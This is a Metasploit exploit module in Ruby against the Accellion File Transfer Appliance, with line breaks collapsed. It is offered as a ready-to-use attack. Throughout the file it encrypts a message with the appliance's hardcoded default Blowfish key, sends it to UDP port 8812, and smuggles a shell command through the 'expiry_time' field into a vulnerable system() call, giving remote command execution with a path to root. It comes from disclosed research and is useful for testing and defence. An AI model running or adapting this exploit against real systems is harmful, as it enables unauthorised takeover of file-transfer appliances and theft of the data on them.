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# Title : Accellion File Transfer Appliance MPIPE2 Command Execution
# Published : 2011-03-11
# Author : metasploit
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### $Id: accellion_fta_mpipe2.rb 11935 2011-03-11 17:37:23Z hdm $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##require 'msf/core'require 'openssl'require 'rexml/element'class Metasploit3 < Msf::Exploit::Remote	Rank = ExcellentRanking	include Msf::Exploit::Remote::Udp	def initialize(info = {})		super(update_info(info,			'Name'           => 'Accellion File Transfer Appliance MPIPE2 Command Execution',			'Description'    => %q{					This module exploits a chain of vulnerabilities in the Accellion 				File Transfer appliance. This appliance exposes a UDP service on 				port 8812 that acts as a gateway to the internal communication bus. 				This service uses Blowfish encryption for authentication, but the 				appliance ships with two easy to guess default authentication keys. 				This module abuses the known default encryption keys to inject a 				message into the communication bus. In order to execute arbitrary 				commands on the remote appliance, a message is injected into the bus 				destined for the 'matchrep' service. This service exposes a function 				named 'insert_plugin_meta_info' which is vulnerable to an input 				validation flaw in a call to system(). This provides access to the 				'soggycat' user account, which has sudo privileges to run the 				primary admin tool as root. These two flaws are fixed in update				version FTA_8_0_562.				},			'Author'         => [ 'hdm' ],			'License'        => MSF_LICENSE,			'Version'        => '$Revision: 11935 $',			'References'     =>				[					['URL', 'http://www.rapid7.com/security-center/advisories/R7-0039.jsp'],				],			'Platform'       => ['unix'],			'Arch'           => ARCH_CMD,			'Privileged'     => true,			'Payload'        =>				{					'Space'       => 1024,					'DisableNops' => true,					'Compat'      =>						{							'PayloadType' => 'cmd',							'RequiredCmd' => 'generic perl ruby bash telnet',						}				},			'Targets'        =>				[					[ 'Automatic', { } ]				],			'DefaultTarget' => 0,			'DisclosureDate' => 'Feb 7 2011'		))		register_options(			[				Opt::RPORT(8812),				OptString.new('APPID', [true, 'The application ID (usually 1000)', '1000'])			], self.class)	end	def exploit		connect_udp				appid = datastore['APPID']		encoded_command = REXML::Text.new(payload.encoded).to_s				wddx = %Q|<wddxPacket version='1.0'><header/><data>	<struct>		<var name='50001'><string>insert_plugin_meta_info</string></var>		<var name='file_handle'><binary length='9'>MDAwMDAwMDAw</binary></var>		<var name='aid'><string>#{appid}</string></var>		<var name='client_ip'><string>127.0.0.1</string></var>		<var name='package_id'><string>1</string></var>		<var name='recipient_list'><array length='1'><string>#{Rex::Text.rand_text_alphanumeric(8)}</string></array></var>		<var name='expiry_time'><string>&apos;; #{encoded_command}; #&apos;</string></var>	</struct></data></wddxPacket>|		packet = [			rand(0xffffffff),	# Source Location ID			8888,				# Destination Location ID			rand(0xffff),		# Source Application			50001,				# Destination Application (matchrep)			Time.now.to_i		].pack("NNnnN") + wddx						header = [			0,		# Flags			0,		#			1,		# Sequence Number (must be the lowest seen from Source ID)			33		# Execute (pass message to destination)		].pack("CCNC") + packet				data = [ simple_checksum(header) ].pack("n") + header		enc  = blowfish_encrypt("123456789ABCDEF0123456789ABCDEF0", data)				udp_sock.put("/x01" + enc)				handler		disconnect_udp	end		def simple_checksum(data)			sum = 0		data.unpack("C*").map{ |c| sum = (sum + c) & 0xffff }		sum	end		#	# This implements blowfish-cbc with an MD5-expanded 448-bit key 	# using RandomIV for the initial value.	#	def blowfish_encrypt(pass, data)		# Forces 8-bit encoding		pass = pass.unpack("C*").pack("C*")		data = data.unpack("C*").pack("C*")				# Use 448-bit keys with 8-byte IV		key_len = 56		iv_len  = 8				# Expand the key with MD5 (key-generated-key mode)		hash = OpenSSL::Digest::MD5.digest(pass)		while (hash.length < key_len)			hash << OpenSSL::Digest::MD5.digest(hash)		end			key = hash[0, key_len]		iv  = Rex::Text.rand_text(iv_len)		c = OpenSSL::Cipher::Cipher.new('bf-cbc')		c.encrypt		c.key_len = key_len		c.key     = key		c.iv      = iv				"RandomIV" + iv + c.update(data) + c.final	endend